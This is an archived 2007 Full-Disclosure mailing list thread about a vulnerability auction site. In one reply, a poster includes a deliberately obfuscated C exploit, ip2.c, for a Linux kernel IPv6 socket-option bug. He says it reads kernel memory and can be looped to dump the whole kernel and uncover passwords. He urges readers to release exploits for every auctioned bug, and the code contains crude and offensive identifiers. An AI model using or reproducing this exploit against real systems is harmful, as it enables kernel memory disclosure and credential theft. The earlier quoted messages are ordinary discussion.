An Auction Site for Vulnerabilities

["Joey Mengele" <joey.mengele () hushmail com>]

Yes, Fakhar has put it best in English so far. 

As a sidenote, WabiSabi seems to have removed my account from their 
system already for unknown reasons. However, included inline is a 
simple exploit for one of the few bugs they are making available 
for currency exchange. I think you will find it trivial to find and 
exploit most (all?) of their other bugs, even those that aren't 
publicly documented ;)

Linux Torvalds documented this particular bug here:

http://bugzilla.kernel.org/show_bug.cgi?id=8134

I don't understand why it is for sale.

The following program can be used to hack 4 bytes out of kernel 
memory. Put it in a loop to dump all of the kernel. If you use an 
insecure program that hasn't been reviewed by the OpenBsD Secure 
Shell team, you might find unscrubbed passwords in there.

I encourage everyone to research and release exploits for every bug 
on the auction block. Remember: it is only consistent with REAL 
hacker ethics to sell bugs to terrorists, NAMBLA, and similar 
organizations such as GOBBLES/n3td3v.

J

__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey 
Mengele, professional hacker
// user, to dump 0xaddress from kernel memory: ./ip2 0xaddress
#include <sys/signal.h>
typedef int fg8;
#include <sys/mman.h>
typedef long _l36;
#include <string.h>
typedef long * jayn9124;
#include <stdio.h>
typedef char * anal;
#include <netinet/in.h>
#define __exit main
#define __main exit
typedef void pleb;
#include <stdlib.h>
fg8 ___hh(fg8,_l36,jayn9124);
#include <unistd.h>
pleb _zzy();
#       define __f4 setsockopt
#       define __f5 getsockopt
fg8 __exit(fg8 argc, anal *argv[]) {
_l36 tmp;
fg8 s;
_l36 hud;
if (argc!=2) __main(-1);
if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1);
signal(SIGSEGV,&exit);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
_zzy();
__f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
___hh(s,hud,&tmp);
printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp);
return 0;
}
int ___hh(int bf,_l36 _rtg,jayn9124 rape)
{
fg8 ot=4;
*(jayn9124)(0x8) = _rtg;
return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot);
}
void _zzy()
{
_l36 *gol = NULL;
if( (gol = mmap( (void *)NULL, 4096,
PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 
)) == (void *) -1 )
{perror( "mmap" );exit(412);}
}
__ ip2.c EOF __

On Mon, 09 Jul 2007 02:41:57 -0400 Fakhar Imran 
<fakharmtc () yahoo com> wrote:
> Well... I believe that ppl do know vulns, that are not 
> discussed/discovered by 
> tech companies or open forums, and they use it for their personal 
> gains.  
> Its just a matter of single transaction that needs to be happen 
> and it'll spread 
> like a wild fire.
>
> cheers
>
>
> ----- Original Message ----
> From: evilrabbi <evilrabbi () gmail com>
> To: Fakhar Imran <fakharmtc () yahoo com>
> Cc: Untitled <full-disclosure () lists grok org uk>
> Sent: Friday, July 6, 2007 7:29:02 PM
> Subject: Re: [Full-disclosure] An Auction Site for Vulnerabilities
>
> I wonder how long it's going to be untill someone finds a vuln in 
> that site then tries to auction it off.
>
>
> On 7/6/07, Fakhar Imran <fakharmtc () yahoo com> wrote: 
> Thanks for the information
>
> ----- Original Message ----
> From: Ivan . < ivanhec () gmail com>
> To: Untitled <full-disclosure () lists grok org uk>
> Sent: Friday, July 6, 2007 11:38:17 AM
> Subject: [Full-disclosure] An Auction Site for Vulnerabilities 
>
>
> http://www.darkreading.com/document.asp?doc_id=128411&WT.svl=news1_
> 1
>
> _______________________________________________ 
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___________________________________________________________________
> _________________
> Pinpoint customers who are looking for what you sell.
> http://searchmarketing.yahoo.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> -- 
> -- h0 h0 h0 --
> www.nopsled.net
>
>
>
> ___________________________________________________________________
> _________________
> Bored stiff? Loosen up... 
> Download and play hundreds of games for free on Yahoo! Games.
> http://games.yahoo.com/games/front

--
Click for special offer on replacement windows - energy efficient
http://tagline.hushmail.com/fc/Ioyw6h4eNoTcOxzEIQa8ZCqjSiLl3KdHV7Zyg0oKADI3bmKeS2TEXu/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/